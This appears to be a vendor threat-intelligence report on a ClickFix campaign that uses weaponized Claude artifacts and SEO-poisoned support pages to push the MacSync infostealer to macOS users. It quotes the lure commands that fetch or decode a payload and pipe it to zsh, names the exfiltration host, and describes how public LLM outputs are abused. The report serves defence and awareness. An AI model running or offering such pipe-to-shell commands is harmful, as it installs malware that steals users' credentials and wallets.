Executive Summary

A sophisticated cyberattack campaign has recently been identified in which public artifacts generated by Anthropic’s Claude LLM are abused to distribute Mac infostealer malware through the ClickFix attack chain. This campaign leverages malicious Google Ads and SEO poisoning to target macOS users seeking technical solutions, redirecting them to weaponized Claude artifacts or impersonated support articles. Unsuspecting users are tricked into executing malicious shell commands in their terminal, resulting in the installation of advanced infostealer malware. The campaign has demonstrated significant reach, with a single malicious Claude artifact receiving over 15,000 views, underscoring the critical risk to organizations and individuals relying on macOS systems.

Threat Actor Profile

The threat actors behind this campaign exhibit characteristics consistent with financially motivated cybercriminals, leveraging opportunistic and scalable attack vectors. While no direct attribution to a known Advanced Persistent Threat (APT) group has been established, the infrastructure, tactics, and procedures closely mirror those observed in previous ClickFix campaigns. The actors demonstrate a high degree of technical sophistication, utilizing public LLM-generated content to bypass traditional security controls and exploit user trust in reputable platforms such as Claude LLM and Medium. The campaign’s infrastructure, including domains such as raxelpak[.]com and a2abotnet[.]com, is designed for resilience and rapid deployment, facilitating both payload delivery and data exfiltration.

Technical Analysis of Malware/TTPs

The attack chain initiates with the user’s interaction with a malicious Claude artifact or a fake support article, both of which instruct the user to execute a shell command in the macOS Terminal. The observed commands include obfuscated payload delivery mechanisms, such as:

echo "<base64_payload>" | base64 -D | zsh and curl -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh.

These commands download and execute a loader for the MacSync infostealer. The loader establishes command-and-control (C2) communication using hardcoded tokens and API keys, masquerading as legitimate macOS browser traffic to evade detection. The malware leverages osascript (AppleScript) to access sensitive data, including Keychain credentials, browser-stored information, and cryptocurrency wallets. Stolen data is archived into /tmp/osalogging.zip and exfiltrated via HTTP POST requests to a2abotnet[.]com/gate. If exfiltration fails, the archive is split and transmission is retried up to eight times, ensuring data theft even under adverse network conditions. Post-exfiltration, the malware performs comprehensive cleanup to remove forensic traces.

The campaign’s technical sophistication is further evidenced by its evasion of macOS Gatekeeper protections, use of living-off-the-land binaries (LOLBins) such as osascript, and dynamic payload delivery infrastructure. The attack chain is modular, allowing rapid adaptation and deployment of new payloads or delivery mechanisms as detection improves.

Exploitation in the Wild

This campaign has been observed in active exploitation, with over 15,600 views recorded on a single malicious Claude artifact, as reported by Moonlock Lab (MacPaw). The attack leverages high-traffic search queries such as “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew,” ensuring a broad victim pool. Similar campaigns have previously abused ChatGPT and Grok chat sharing features to deliver the AMOS infostealer, indicating a trend of exploiting public LLM artifacts for malware distribution. The use of Google Ads and SEO poisoning amplifies the campaign’s reach, enabling the threat actors to target both individual users and enterprise environments indiscriminately.

Security researchers from Moonlock Lab and AdGuard have documented the campaign’s evolution, noting the rapid adaptation of social engineering techniques and payload delivery methods. The campaign’s infrastructure is robust, with multiple fallback domains and payload variants observed in the wild.

Victimology and Targeting

The primary targets of this campaign are macOS users, particularly those seeking technical solutions or troubleshooting advice via search engines. The attack is not limited to a specific industry or geographic region, as the use of generic technical queries ensures a wide victim base. However, the campaign poses heightened risks to organizations with a significant macOS footprint, including technology firms, creative industries, and financial institutions. The malware’s focus on credential theft, browser data, and cryptocurrency wallets suggests a dual objective of financial gain and potential access to sensitive corporate resources.

Victims are typically lured through search engine results or sponsored ads, redirected to weaponized Claude artifacts or impersonated support articles. The reliance on user-initiated command execution bypasses many traditional endpoint security controls, making user awareness and technical controls critical for mitigation.

Mitigation and Countermeasures

Organizations and individuals can reduce their exposure to this threat through a combination of user education, technical controls, and proactive monitoring. Users should be trained to avoid executing shell commands from untrusted sources, especially those found in public LLM artifacts or unofficial support articles. The legitimacy of technical guides and scripts should always be verified before execution.

From a technical perspective, network controls should be implemented to block access to known malicious domains, including raxelpak[.]com and a2abotnet[.]com. Endpoint monitoring should be configured to detect suspicious use of osascript, unexpected archive creation in /tmp/, and outbound HTTP POST requests to unrecognized domains. Security teams should maintain up-to-date threat intelligence feeds and regularly review indicators of compromise (IOCs) associated with this campaign.

Organizations are encouraged to implement application whitelisting, restrict the execution of unsigned scripts, and enforce the principle of least privilege on macOS endpoints. Regular security awareness training and simulated phishing exercises can further reduce the risk of user-initiated compromise.

References

BleepingComputer: Claude LLM artifacts abused to push Mac infostealers in ClickFix attack, Moonlock Lab (MacPaw) - Twitter, AdGuard - Malicious HomeBrew search results, MITRE ATT&CK Techniques: T1059.004, T1555, T1041, OpenText Cybersecurity Community: Claude LLM artifacts abused to push Mac infostealers in ClickFix attack, Cybersecurity News: Threat actors exploit Claude artifacts and Google Ads.

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their digital supply chain. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats, ensuring robust protection for critical assets and business operations.

For further information or to discuss tailored threat intelligence solutions, we are happy to answer questions at ops@rescana.com.